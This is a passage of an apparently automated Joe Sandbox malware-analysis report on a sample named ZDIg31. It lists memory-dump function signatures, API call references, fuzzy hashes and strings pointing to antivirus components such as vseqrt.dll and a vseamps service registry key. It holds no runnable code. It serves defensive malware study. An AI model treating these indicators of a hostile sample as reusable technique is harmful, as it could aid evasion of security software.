                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                      • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                      • API String ID: 3682727354-300733478
                                      • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                      • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                      • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                      • API String ID: 2587151837-1427723692
                                      • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                      • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                      • String ID: SetDllDirectoryW$kernel32.dll
                                      • API String ID: 3184163350-3826188083
                                      • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                      • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3424473247-996641649
                                      • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                      • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1775797328-0
                                      • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                      • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                      • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 1232609184-0
                                      • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                      • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                      • String ID: H
                                      • API String ID: 2107338056-2852464175
                                      • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                      • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                      • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                      • API String ID: 1322048431-2685357988
                                      • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                      • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                      • API String ID: 2984211723-3002863673
                                      • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                      • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                      • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                      • API String ID: 678758403-4129911376
                                      • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                      • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3424473247-0
                                      • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                      • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                      • String ID: bad exception$csm$csm$csm
                                      • API String ID: 3766904988-820278400
                                      • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                      • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                      • String ID:
                                      • API String ID: 2707001247-0
                                      • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                      • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 849930591-393685449
                                      • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction ID: 184ed61f8439266f1711e7033d533a4f02ae36b66d84c5d89396de15ce85f444
                                      • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction Fuzzy Hash: 94D170A2E287498AEB309F6594403BD77B0FB45798F100239EA4D57B76CF38E691C750
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                      • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                      • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 3013587201-537541572
                                      • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction ID: 73343cbb1db80b14b1927ba72e94676f6a39bfd49108cc96371897f7bea451c4
                                      • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction Fuzzy Hash: EA412261F39A0A81EA32CB12A8206BA3395BF05BE4F084535DD1E477B4EF3CE605C360
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                      • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 1119674940-1966266597
                                      • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                      • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen$ComputerName
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3702919091-996641649
                                      • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                      • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$Info
                                      • String ID:
                                      • API String ID: 1775632426-0
                                      • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                      • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE9B9072EB,?,?,?,00007FFE9B903EC0,?,?,?,?,00007FFE9B903CFD), ref: 00007FFE9B9071B1
                                      • GetLastError.KERNEL32(?,?,?,00007FFE9B9072EB,?,?,?,00007FFE9B903EC0,?,?,?,?,00007FFE9B903CFD), ref: 00007FFE9B9071BF
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE9B9072EB,?,?,?,00007FFE9B903EC0,?,?,?,?,00007FFE9B903CFD), ref: 00007FFE9B9071E9
                                      • FreeLibrary.KERNEL32(?,?,?,00007FFE9B9072EB,?,?,?,00007FFE9B903EC0,?,?,?,?,00007FFE9B903CFD), ref: 00007FFE9B907257
                                      • GetProcAddress.KERNEL32(?,?,?,00007FFE9B9072EB,?,?,?,00007FFE9B903EC0,?,?,?,?,00007FFE9B903CFD), ref: 00007FFE9B907263
                                      Strings
                                      Memory Dump Source
